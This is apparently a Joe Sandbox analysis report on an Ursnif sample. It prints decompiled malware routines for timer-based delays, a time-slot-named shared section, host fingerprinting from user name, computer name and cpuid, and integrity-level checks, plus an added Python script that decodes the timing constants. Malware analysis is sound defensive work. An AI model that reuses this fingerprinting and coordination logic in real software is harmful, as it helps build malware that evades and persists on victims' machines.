                                                  								__eflags = _t64;
                                                  								_v8.LowPart = _t64;
                                                  								if(_t64 == 0) {
                                                  									goto L6;
                                                  								} else {
                                                  									goto L12;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					L12:
                                                  					// Free the buffer referenced by the first dword of each of the three 16-byte
                                                  					// table entries from the heap at 0x547d238, then close the timer.
                                                  					_t78 =  &_v92;
                                                  					_t70 = 3;
                                                  					do {
                                                  						_t54 =  *_t78;
                                                  						if(_t54 != 0) {
                                                  							HeapFree( *0x547d238, 0, _t54);
                                                  						}
                                                  						_t78 =  &(_t78[4]);
                                                  						_t70 = _t70 - 1;
                                                  					} while (_t70 != 0);
                                                  					CloseHandle(_v44);
                                                  				}
                                                  				return _v8;
                                                  			}
                                                  [Per-line instruction addresses for the C-Code above: 0x05476786 .. 0x05476923 (0x00000000 = line has no address)]

                                                  APIs
                                                  • memset.NTDLL ref: 0547679B
                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 054767A7
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 054767CC
                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 054767E8
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05476801
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 05476897
                                                  • CloseHandle.KERNEL32(?), ref: 054768A6
                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 054768E0
                                                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,05472417,?), ref: 054768F6
                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05476901
                                                    • Part of subcall function 054773FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073E93C0,?,00000000,30314549,00000014,004F0053,073E937C), ref: 054774E9
                                                    • Part of subcall function 054773FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,05476814), ref: 054774FB
                                                  • GetLastError.KERNEL32 ref: 05476913
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                  • String ID:
                                                  • API String ID: 3521023985-0
                                                  • Opcode ID: 3e024c75f916abb4422161b8809114d4310cb557449f4bfb03200555dfb12ddb
                                                  • Instruction ID: 3a9a52b58736032b771af979cdd46151052557937acfe55fd81a0c80fb047a7a
                                                  • Opcode Fuzzy Hash: 3e024c75f916abb4422161b8809114d4310cb557449f4bfb03200555dfb12ddb
                                                  • Instruction Fuzzy Hash: 7D516C7181122DAACF14DFD5DC49DEEBFBAFF49320F21425AF411A2280DB709A45CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E05471B2F(intOrPtr __edx, void** _a4, void** _a8) {
                                                  				intOrPtr _v8;
                                                  				struct _FILETIME* _v12;
                                                  				short _v56;
                                                  				struct _FILETIME* _t12;
                                                  				intOrPtr _t13;
                                                  				void* _t17;
                                                  				void* _t21;
                                                  				intOrPtr _t27;
                                                  				long _t28;
                                                  				void* _t30;
                                                  
                                                  				_t27 = __edx;
                                                  				// _v12 / _v8 receive dwLowDateTime / dwHighDateTime of the current UTC time.
                                                  				_t12 =  &_v12;
                                                  				GetSystemTimeAsFileTime(_t12);
                                                  				// L0547B0C2 is _aulldiv (see APIs): FILETIME / 0x0000019254D38000.
                                                  				// 0x19254D38000 == 1,728,000,000,000 100-ns units == 48 hours, so the quotient is
                                                  				// a two-day slot number that changes only every 48 hours.
                                                  				_push(0x192);
                                                  				_push(0x54d38000);
                                                  				_push(_v8);
                                                  				_push(_v12);
                                                  				L0547B0C2();
                                                  				_push(_t12);
                                                  				_v12 = _t12;
                                                  				// Pointers into the sample's own data, adjusted by the delta stored at 0x547d27c.
                                                  				_t13 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t5 = _t13 + 0x547e862; // 0x73e8e0a
                                                  				_t6 = _t13 + 0x547e59c; // 0x530025
                                                  				_push(0x16);
                                                  				_push( &_v56);
                                                  				_v8 = _t27;
                                                  				// L0547AD5A is _snwprintf (see APIs): renders the slot number into _v56 (at most
                                                  				// 0x16 WCHARs), which is then used as the section name.
                                                  				L0547AD5A();
                                                  				// 0xffffffff = INVALID_HANDLE_VALUE (pagefile-backed), 0x547d2a8 = SECURITY_ATTRIBUTES,
                                                  				// 4 = PAGE_READWRITE, 0x1000 bytes.
                                                  				_t17 = CreateFileMappingW(0xffffffff, 0x547d2a8, 4, 0, 0x1000,  &_v56); // executed
                                                  				_t30 = _t17;
                                                  				if(_t30 == 0) {
                                                  					_t28 = GetLastError();
                                                  				} else {
                                                  					// Only a section that already existed (ERROR_ALREADY_EXISTS, 0xb7) is accepted.
                                                  					// A freshly created one is closed again and 2 (ERROR_FILE_NOT_FOUND) returned, so
                                                  					// this routine locates shared state left by an earlier instance, never creates it.
                                                  					if(GetLastError() == 0xb7) {
                                                  						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed; 6 == FILE_MAP_READ | FILE_MAP_WRITE
                                                  						if(_t21 == 0) {
                                                  							_t28 = GetLastError();
                                                  							if(_t28 != 0) {
                                                  								goto L6;
                                                  							}
                                                  						} else {
                                                  							 *_a4 = _t30;
                                                  							 *_a8 = _t21;
                                                  							_t28 = 0;
                                                  						}
                                                  					} else {
                                                  						_t28 = 2;
                                                  						L6:
                                                  						CloseHandle(_t30);
                                                  					}
                                                  				}
                                                  				return _t28;
                                                  			}
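The 64-bit constants that E05476786 feeds to _allmul and that E05471B2F feeds to _aulldiv are the part of these two routines an analyst most needs to read correctly, and the decompiler leaves them as raw (low, high) dword pairs. The script below is an added worked example, not code from the sample, from Joe Sandbox or from this report: it decodes those pairs into the delay in seconds that SetWaitableTimer will see and into the length and boundaries of the 48-hour slot whose number becomes the section name. The dword pairs are copied from the push sequences above; the loop-count multiplier and the timestamp are constructed inputs, and the values of the globals at 0x547d240, 0x547d244 and 0x547d248 are not recovered by the report, so only their units are shown.

```python
"""Decode the timing constants from the decompiled Ursnif routines.

Added example: not the sample's code and not produced by the sandbox.
Constants below are the (low, high) dword pairs as pushed in E05476786
and E05471B2F; everything fed into them is constructed test input.
"""
import datetime as _dt

HUNDRED_NS_PER_SECOND = 10_000_000
FILETIME_EPOCH = _dt.datetime(1601, 1, 1, tzinfo=_dt.timezone.utc)

# (low dword, high dword) exactly as the decompiled code pushes them.
SECOND_TICK = (0xFF676980, 0xFFFFFFFF)   # _allmul operand, first wait in E05476786
MINUTE_TICK = (0xDC3CBA00, 0xFFFFFFFF)   # _allmul operand, 0x10d2 retry wait in E05476786
SLOT_DIVISOR = (0x54D38000, 0x00000192)  # _aulldiv operand in E05471B2F


def dwords_to_int64(low, high):
    """Reassemble a signed 64-bit value from the two dwords on the stack."""
    value = ((high & 0xFFFFFFFF) << 32) | (low & 0xFFFFFFFF)
    return value - (1 << 64) if value & (1 << 63) else value


def relative_due_time(const, multiplier=1):
    """Delay in seconds for SetWaitableTimer's pDueTime = multiplier * const.

    A negative due time is relative to 'now' in 100-ns units, so the delay
    is -ticks / 1e7. A non-negative product would be an absolute FILETIME,
    which these routines never produce; refuse it rather than report a
    bogus wait. 'multiplier' stands in for the global the sample multiplies
    by (e.g. *0x547d240), whose value this report does not recover.
    """
    ticks = multiplier * dwords_to_int64(*const)
    if ticks >= 0:
        raise ValueError("not a relative due time: 0x%x" % (ticks & 0xFFFFFFFFFFFFFFFF))
    return -ticks / HUNDRED_NS_PER_SECOND


def utc(year, month, day, hour=0, minute=0):
    """Constructed UTC timestamps for the examples below."""
    return _dt.datetime(year, month, day, hour, minute, tzinfo=_dt.timezone.utc)


def datetime_to_filetime(dt):
    """Aware UTC datetime -> FILETIME (100-ns intervals since 1601-01-01)."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * HUNDRED_NS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ft):
    """FILETIME -> aware UTC datetime (sub-microsecond ticks dropped)."""
    return FILETIME_EPOCH + _dt.timedelta(microseconds=ft // 10)


def slot_length_seconds(divisor):
    """Length of one window of the _aulldiv quotient, in seconds."""
    return dwords_to_int64(*divisor) / HUNDRED_NS_PER_SECOND


def time_slot(filetime, divisor):
    """The quotient _aulldiv returns: which fixed-length window 'now' is in."""
    return filetime // dwords_to_int64(*divisor)


def slot_window(dt, divisor):
    """Start and end (UTC) of the window containing dt, i.e. the moment a
    name derived from the quotient last changed and when it changes next."""
    d = dwords_to_int64(*divisor)
    start = (datetime_to_filetime(dt) // d) * d
    return filetime_to_datetime(start), filetime_to_datetime(start + d)


if __name__ == "__main__":
    print("first wait unit     :", relative_due_time(SECOND_TICK), "s  x *0x547d240")
    print("retry wait unit     :", relative_due_time(SECOND_TICK), "s  x *0x547d244")
    print("0x10d2 retry unit   :", relative_due_time(MINUTE_TICK), "s  x *0x547d248")
    print("slot length         :", slot_length_seconds(SLOT_DIVISOR) / 3600, "h")
    now = utc(2021, 9, 7, 12)  # constructed timestamp
    print("slot number at", now, ":", time_slot(datetime_to_filetime(now), SLOT_DIVISOR))
    print("section name stable :", slot_window(now, SLOT_DIVISOR))
```

Run it as-is and it prints the decoded units; swap the constructed timestamp for the analysis time to see the window in which a given run would have produced the same section name. Because the slot boundaries are aligned to 1601-01-01 rather than to the moment of infection, two instances started within the same two-day window get the same name and the second one's E05471B2F call succeeds, while a run that straddles a boundary sees the name change underneath it.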
                                                  [Per-line instruction addresses for the C-Code above: 0x05471b2f .. 0x05471bf1 (0x00000000 = line has no address)]

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,054722EA,?,?,4D283A53,?,?), ref: 05471B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 05471B51
                                                  • _snwprintf.NTDLL ref: 05471B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,0547D2A8,00000004,00000000,00001000,?), ref: 05471B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?,4D283A53), ref: 05471BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 05471BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?), ref: 05471BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,054722EA,?,?,4D283A53), ref: 05471BE4
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 2c0c3666935b33399f0e98fbe9e27a23b5130ac32ea0fefadd31b1092938e3a8
                                                  • Instruction ID: a5d7f4b9b0b0ddc527437a065d7f543816305a0b9299093fffb14589bbcdbb28
                                                  • Opcode Fuzzy Hash: 2c0c3666935b33399f0e98fbe9e27a23b5130ac32ea0fefadd31b1092938e3a8
                                                  • Instruction Fuzzy Hash: 1E21C37660020CBBC725DBA4CC4AFCA7BA9AF84750F210166F605EB290EA709A05CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 96%
                                                  			E0547269C(char __eax, signed int* __esi) {
                                                  				long _v8;
                                                  				char _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v28;
                                                  				long _t34;
                                                  				signed int _t39;
                                                  				long _t50;
                                                  				char _t59;
                                                  				intOrPtr _t61;
                                                  				void* _t62;
                                                  				void* _t63;
                                                  				signed int* _t64;
                                                  				char _t65;
                                                  				intOrPtr* _t67;
                                                  				void* _t68;
                                                  				signed int* _t69;
                                                  
                                                  				_t69 = __esi;
                                                  				_t65 = __eax;
                                                  				_v8 = 0;
                                                  				_v12 = __eax;
                                                  				if(__eax == 0) {
                                                  					_t59 =  *0x547d270; // 0xd448b889
                                                  					_v12 = _t59;
                                                  				}
                                                  				_t64 = _t69;
                                                  				E05476B43( &_v12, _t64);
                                                  				if(_t65 != 0) {
                                                  					 *_t69 =  *_t69 ^  *0x547d278 ^ 0x4c0ca0ae;
                                                  				} else {
                                                  					GetUserNameW(0,  &_v8); // executed
                                                  					_t50 = _v8;
                                                  					if(_t50 != 0) {
                                                  						_t62 = RtlAllocateHeap( *0x547d238, 0, _t50 + _t50);
                                                  						if(_t62 != 0) {
                                                  							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                  								_t63 = _t62;
                                                  								 *_t69 =  *_t69 ^ E05472496(_v8 + _v8, _t63);
                                                  							}
                                                  							HeapFree( *0x547d238, 0, _t62);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t61 = __imp__;
                                                  				_v8 = _v8 & 0x00000000;
                                                  				GetComputerNameW(0,  &_v8);
                                                  				_t34 = _v8;
                                                  				if(_t34 != 0) {
                                                  					_t68 = RtlAllocateHeap( *0x547d238, 0, _t34 + _t34);
                                                  					if(_t68 != 0) {
                                                  						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                  							_t63 = _t68;
                                                  							_t69[3] = _t69[3] ^ E05472496(_v8 + _v8, _t63);
                                                  						}
                                                  						HeapFree( *0x547d238, 0, _t68);
                                                  					}
                                                  				}
                                                  				asm("cpuid");
                                                  				_t67 =  &_v28;
                                                  				 *_t67 = 1;
                                                  				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                  				 *(_t67 + 8) = _t63;
                                                  				 *(_t67 + 0xc) = _t64;
                                                  				_t39 = _v16 ^ _v20 ^ _v28;
                                                  				_t69[1] = _t69[1] ^ _t39;
                                                  				return _t39;
                                                  			}


                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 054726D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 054726EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 054726F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,054723D9), ref: 05472718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0547273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05472753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 05472760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,054723D9), ref: 0547277E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 7beb2c21b51f32d7c302d3c1e66ecdd6557636dc98d26656b06ad907549caf2f
                                                  • Instruction ID: 0bad08970ff994255909caf8cc95b0a0be641bbcbfb1d376d8838bb619e2f682
                                                  • Opcode Fuzzy Hash: 7beb2c21b51f32d7c302d3c1e66ecdd6557636dc98d26656b06ad907549caf2f
                                                  • Instruction Fuzzy Hash: 4F314875A24209EFDB15DFA9C981AEEBBF9FF48200B2040AAE405D7210DB70EA418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			E0547924F(long* _a4) {
                                                  				long _v8;
                                                  				void* _v12;
                                                  				void _v16;
                                                  				long _v20;
                                                  				int _t33;
                                                  				void* _t46;
                                                  
                                                  				_v16 = 1;
                                                  				_v20 = 0x2000;
                                                  				if( *0x547d25c > 5) {
                                                  					_v16 = 0;
                                                  					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                  						_v8 = 0;
                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                  						if(_v8 != 0) {
                                                  							_t46 = E05472049(_v8);
                                                  							if(_t46 != 0) {
                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                  								if(_t33 != 0) {
                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                  								}
                                                  								E05479039(_t46);
                                                  							}
                                                  						}
                                                  						CloseHandle(_v12);
                                                  					}
                                                  				}
                                                  				 *_a4 = _v20;
                                                  				return _v16;
                                                  			}


                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 05479281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 054792A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 054792B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 05479301
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 054792D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 054792DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 054792EC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 4fae33db728c164cd2c833355c6489f5262a9cd879a5a6e2f00a865f06d1a7c2
                                                  • Instruction ID: 76b77edf473bda379e1780f1c7f027b234410388b232cbf9990572c95c20233b
                                                  • Opcode Fuzzy Hash: 4fae33db728c164cd2c833355c6489f5262a9cd879a5a6e2f00a865f06d1a7c2
                                                  • Instruction Fuzzy Hash: 4D21197591425DFFEB019F95DC85DEEBF7AEF48304F1000A6F911A6290CB719A05EB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E05476A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                  				struct _FILETIME _v12;
                                                  				void* _t10;
                                                  				void* _t12;
                                                  				int _t14;
                                                  				signed int _t16;
                                                  				void* _t18;
                                                  				signed int _t19;
                                                  				unsigned int _t23;
                                                  				void* _t26;
                                                  				signed int _t33;
                                                  
                                                  				_t26 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                  				 *0x547d238 = _t10;
                                                  				if(_t10 != 0) {
                                                  					 *0x547d1a8 = GetTickCount();
                                                  					_t12 = E05478F10(_a4);
                                                  					if(_t12 == 0) {
                                                  						do {
                                                  							GetSystemTimeAsFileTime( &_v12);
                                                  							_t14 = SwitchToThread();
                                                  							_t23 = _v12.dwHighDateTime;
                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                  							_push(0);
                                                  							_push(9);
                                                  							_push(_t23 >> 7);
                                                  							_push(_t16);
                                                  							L0547B226();
                                                  							_t33 = _t14 + _t16;
                                                  							_t18 = E05477E03(_a4, _t33);
                                                  							_t19 = 2;
                                                  							_t25 = _t33;
                                                  							Sleep(_t19 << _t33); // executed
                                                  						} while (_t18 == 1);
                                                  						if(E05476B96(_t25) != 0) {
                                                  							 *0x547d260 = 1; // executed
                                                  						}
                                                  						_t12 = E0547225B(_t26); // executed
                                                  					}
                                                  				} else {
                                                  					_t12 = 8;
                                                  				}
                                                  				return _t12;
                                                  			}


                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476A69
                                                  • GetTickCount.KERNEL32 ref: 05476A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,0547807D,?), ref: 05476A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,0547807D,?), ref: 05476A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 05476ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476AD6
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: ac8a19f476760b24cc7c8ddb27aae6cd98b72166b4909139214b289d1a3f945f
                                                  • Instruction ID: c242aac3ddfd5e14cbffb6229f4c2281512bed8481a0b8be0f7fd8d15bd5f4bf
                                                  • Opcode Fuzzy Hash: ac8a19f476760b24cc7c8ddb27aae6cd98b72166b4909139214b289d1a3f945f
                                                  • Instruction Fuzzy Hash: A911C672B1460C6FE728ABA5DC4EFEA3F99EB45350F11452EF505D6280EEB0D80086A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 57%
                                                  			E0547225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E0547550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0x547d25c; // 0x4000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0x547d25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0x547d164(0, 2);
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E05473D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
                                                  					_t26 =  *0x547d27c; // 0x1f6a5a8
                                                  					if( *0x547d25c > 5) {
                                                  						_t8 = _t26 + 0x547e5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0x547ea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E05471BF4(_t27, _t27);
                                                  					_t31 = E05471B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0x547d270 =  *0x547d270 ^ 0x81bbe65d;
                                                  						_t32 = E05472049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0x547d32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0x547d32c; // 0x73e95b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0x547d32c; // 0x73e95b0
                                                  							 *_t51 = 0x547e836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0x547d238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0x547d2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0x547d25c; // 0x4000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0x547d27c; // 0x1f6a5a8
                                                  								_t13 = _t58 + 0x547e55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x547c2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E0547269C( ~_v8 &  *0x547d270, 0x547d00c); // executed
                                                  								_t42 = E05474094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E054796A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E05476786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E05473DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0x547d160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E0547A501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}


                                                  APIs
                                                    • Part of subcall function 0547550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,05472274,00000000,00000000), ref: 0547551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 054722F1
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • memset.NTDLL ref: 05472340
                                                  • RtlInitializeCriticalSection.NTDLL(073E9570), ref: 05472351
                                                    • Part of subcall function 05473DD9: memset.NTDLL ref: 05473DEE
                                                    • Part of subcall function 05473DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 05473E22
                                                    • Part of subcall function 05473DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 05473E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 0547237C
                                                  • wsprintfA.USER32 ref: 054723AC
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
